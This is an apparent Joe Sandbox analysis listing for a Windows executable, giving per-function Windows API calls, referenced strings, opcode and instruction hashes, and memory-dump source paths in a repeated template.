                          • Opcode Fuzzy Hash: d14586fa0ca475f9c49d650f7080b2a880bc94f0dc3d042ba5476e41f1a93b1a
                          • Instruction Fuzzy Hash: 65F06275240304AFEB211FA5EC88E673BACFF46764F20006AFA41D71A0DB619C42CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetDlgItem.USER32(?,000003E9), ref: 00B3FA8F
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B3FAA6
                          • MessageBeep.USER32(00000000), ref: 00B3FABE
                          • KillTimer.USER32(?,0000040A), ref: 00B3FADA
                          • EndDialog.USER32(?,00000001), ref: 00B3FAF4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                          • String ID:
                          • API String ID: 3741023627-0
                          • Opcode ID: 3e1261fc1589a9a4e8ed8dc7186c57fcaffc771616a6f0b2712e1729122a4ade
                          • Instruction ID: 6bfcc536bc5f14859276b955b8bf08a5633e197df151dd052627175b5b9d03fa
                          • Opcode Fuzzy Hash: 3e1261fc1589a9a4e8ed8dc7186c57fcaffc771616a6f0b2712e1729122a4ade
                          • Instruction Fuzzy Hash: B7018630900705ABEB20AB10DD4EBE677F8FB10B05F1401AAB547A50F0DFF0A944CB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • EndPath.GDI32(?), ref: 00B1B526
                          • StrokeAndFillPath.GDI32(?,?,00B7F583,00000000,?), ref: 00B1B542
                          • SelectObject.GDI32(?,00000000), ref: 00B1B555
                          • DeleteObject.GDI32 ref: 00B1B568
                          • StrokePath.GDI32(?), ref: 00B1B583
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Path$ObjectStroke$DeleteFillSelect
                          • String ID:
                          • API String ID: 2625713937-0
                          • Opcode ID: 09d92665266a9e60cd3dfbb759aa33c487181e23779a0e7cb54f7c36be454be3
                          • Instruction ID: deb2c5d33a34c3c6f4401c4ae0b32ee9aa2ecbd50661c8b0b4e7a559a8089713
                          • Opcode Fuzzy Hash: 09d92665266a9e60cd3dfbb759aa33c487181e23779a0e7cb54f7c36be454be3
                          • Instruction Fuzzy Hash: D3F03C30008204EBCB156F29EC2CF943FE2FB16322F548655E4A5A60F1CB3089E5DF10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 00B23F7D
                            • Part of subcall function 00B2EE80: __87except.LIBCMT ref: 00B2EEBB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorHandling__87except__start
                          • String ID: pow
                          • API String ID: 2905807303-2276729525
                          • Opcode ID: 9c088a8e333c752b9d39560907a8ee3d6edce1b4bb95f10616a057816a9704d2
                          • Instruction ID: a9415cdc574847da11e13432c2cc95f42c0f015b9aeca934f79c174ce54c14fb
                          • Opcode Fuzzy Hash: 9c088a8e333c752b9d39560907a8ee3d6edce1b4bb95f10616a057816a9704d2
                          • Instruction Fuzzy Hash: 36512B21D0822296D715BB18FB5137B6BF4DB40B10F208DE9E4AD461A9EF39CDC89A46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$+
                          • API String ID: 0-2552117581
                          • Opcode ID: 1db3f33638d78785c6c97e0cc688b4c645caa082c40b125c0b24e088b949b1e4
                          • Instruction ID: eeed27ebed9575fada1b206465ce0efb315f82daa4795ea75511e3cf5448de1a
                          • Opcode Fuzzy Hash: 1db3f33638d78785c6c97e0cc688b4c645caa082c40b125c0b24e088b949b1e4
                          • Instruction Fuzzy Hash: 3A512035108256CFDF21EF68C494AFA7BE0EF26311F548095F8A69B2E1D7749C92CB21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B9DC40,?,0000000F,0000000C,00000016,00B9DC40,?), ref: 00B4507B
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                            • Part of subcall function 00B0B8A7: _memmove.LIBCMT ref: 00B0B8FB
                          • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00B450FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                          • String ID: REMOVE$THIS
                          • API String ID: 2528338962-776492005
                          • Opcode ID: 690085ae8fd1bafbf45d13b87576f0f1f05bc9d800cacce7226082f1d5e4f8fd
                          • Instruction ID: c97ad06d378d1941b76af56bfb1107d7e981013621f3cc5694a42040de8dba2c
                          • Opcode Fuzzy Hash: 690085ae8fd1bafbf45d13b87576f0f1f05bc9d800cacce7226082f1d5e4f8fd
                          • Instruction Fuzzy Hash: 67415F75A00A099FCF25DF54C881AAEB7F5FF48314F0484A9E856AB392DB349E41DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B410EE
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B410FF
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B41181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressProc
                          • String ID: DllGetClassObject
                          • API String ID: 1548245697-1075368562
                          • Opcode ID: e3d878e46b93fdbdfe82aa8342d39b65951972f982d4610284eb4498faf2531e
                          • Instruction ID: b1128d38ded89b7009337286ca6c023717acae096cfbfbd1eb97a8dbfc09ad2c
                          • Opcode Fuzzy Hash: e3d878e46b93fdbdfe82aa8342d39b65951972f982d4610284eb4498faf2531e
                          • Instruction Fuzzy Hash: 89413C71A00204AFDB05DF58C884BAA7BF9EF44350F1488A9EA05EF255D7B1DA84DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B9DBF0,00000000,?,?,?,?), ref: 00B6A4E6
                          • GetWindowLongW.USER32 ref: 00B6A503
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B6A513
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: a6705c98c2380e43497699d602c3e3ecb0f5b1b414ca2f95098d07260dcba0a0
                          • Instruction ID: 580238b3aee5a623ebe760012689730e752979927b1503d0653e1d7097f8f52c
                          • Opcode Fuzzy Hash: a6705c98c2380e43497699d602c3e3ecb0f5b1b414ca2f95098d07260dcba0a0
                          • Instruction Fuzzy Hash: FD318D31200205ABDF219F38CC45BEA7BE9FB49328F244765F976A32E1DB74E8509B51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B69F6B
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B69F7F
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B69FA3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: f80b372f9c70ea2a2ccabf1cb462faec812a00b5976fac296bf1f8505d325f41
                          • Instruction ID: 84add060756ab7f848ef4a55c643463fe5755610e86d64a5b01f19976d40e8a1
                          • Opcode Fuzzy Hash: f80b372f9c70ea2a2ccabf1cb462faec812a00b5976fac296bf1f8505d325f41
                          • Instruction Fuzzy Hash: 2B21AE32540218BBDF118F94CC82FEA3BB9EF59724F120254FA59AB1D0DAB5F850DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B6A74F
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B6A75D
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B6A764
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: 33072a0e12a80ca258cd05ef846d0e366baad4f9c498bcfe994ec0d3b643795b
                          • Instruction ID: 1ecc05d17eea029d93322c8391210613dcb52595f1c73b3b6e5d304f581434e0
                          • Opcode Fuzzy Hash: 33072a0e12a80ca258cd05ef846d0e366baad4f9c498bcfe994ec0d3b643795b
                          • Instruction Fuzzy Hash: 8F216575604205AFDB10DF68DCC1EB777EDEB4A794B140499F905AB252CB70EC11CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B6983D
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B6984D
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B69872
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: 241e2032e29ca29aeaacab33a0c73e571084296b9c546d74984feb43c42603b2
                          • Instruction ID: 0b2fc914b3904706217d9c628d289c46ff67a8634892e72bd13ec4f08a069c9f
                          • Opcode Fuzzy Hash: 241e2032e29ca29aeaacab33a0c73e571084296b9c546d74984feb43c42603b2
                          • Instruction Fuzzy Hash: 9221C232610118BFEB118F54CC85FBB3BEEEF8A794F118164F9149B1A0CA759C518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B6A27B
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B6A290
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B6A29D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 952e0f4fda916e922665bafeae1cf0065b573b380a446e8064f2608ad2f2d548
                          • Instruction ID: 17fffbaecd46484277dcf7db32c86a84ceed3b581537092f747ba8221390fe0d
                          • Opcode Fuzzy Hash: 952e0f4fda916e922665bafeae1cf0065b573b380a446e8064f2608ad2f2d548
                          • Instruction Fuzzy Hash: 7E110171280208BBEF205F65CC46FE73BA8EF89B14F114118FA45A60D0D676A851CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B22F4E), ref: 00B2304E
                          • GetProcAddress.KERNEL32(00000000), ref: 00B23055
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 2574300362-2819208100
                          • Opcode ID: 260da3b62b1e80abb8b1f12329ed20d800e3206b22c11242d18107ea6cf3c7f3
                          • Instruction ID: 6766d4c66f88fb12902a7af3cd29edad481ce7723a8514e0005aa4154ebf755e
                          • Opcode Fuzzy Hash: 260da3b62b1e80abb8b1f12329ed20d800e3206b22c11242d18107ea6cf3c7f3
                          • Instruction Fuzzy Hash: 01E09270A64204EFDB207FA1ED0DF057AA4B708B02F140599F209B30F0CFB88500CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B620EC,?,00B5F751), ref: 00B62104
                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00B62116
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetProcessId$kernel32.dll
                          • API String ID: 2574300362-399901964
                          • Opcode ID: e9a89727239f46acee35828ba855381a97565625d935ec9bd7aabbd4c2542590
                          • Instruction ID: f1ed91587fc5a1edc5d4294d421fe1c104bb04d0e405c5805b6cd582ec88624f
                          • Opcode Fuzzy Hash: e9a89727239f46acee35828ba855381a97565625d935ec9bd7aabbd4c2542590
                          • Instruction Fuzzy Hash: 30D0A734414B129FE7306F61E80D75237D4EF04700B00449AEA59F21B5DBB4C480CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00B41371,?,00B41519), ref: 00B413B4
                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00B413C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1587604923
                          • Opcode ID: f15b3899e23da82d063ea8f364168d6187e3043d79934274d6c8cb6ce4a06a9d
                          • Instruction ID: b790e9a94d8fb792125c6e7e5e50d797a97760d49be0f6045b63f7241883e278
                          • Opcode Fuzzy Hash: f15b3899e23da82d063ea8f364168d6187e3043d79934274d6c8cb6ce4a06a9d
                          • Instruction Fuzzy Hash: 2BD05E31804712ABD7212F28A84875137E8AF40704B00489AE456A25B0EAB0C480C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,00B4135F,?,00B41440), ref: 00B41389
                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00B4139B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1071820185
                          • Opcode ID: 0fbea33d04a0acc3a5faf598c4fe33c9cd17b83050f0dd65630d4423b1cf3185
                          • Instruction ID: 1c48fabc8a5c00a88fd6d69a9575caa4d65ef23928a37d111ee5520c92fb7b08
                          • Opcode Fuzzy Hash: 0fbea33d04a0acc3a5faf598c4fe33c9cd17b83050f0dd65630d4423b1cf3185
                          • Instruction Fuzzy Hash: DDD0A730C00712BFD7202F28EC4C79137D4EF04B04F44489AE485E29B0DAB0D5C0D714
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B1E69C,?,00B1E43F), ref: 00B1E6B4
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B1E6C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          • Opcode ID: f938473b66c87a0a5f52d0acb223aec1107d9d9f732444c15a924d7c3bf9d96d
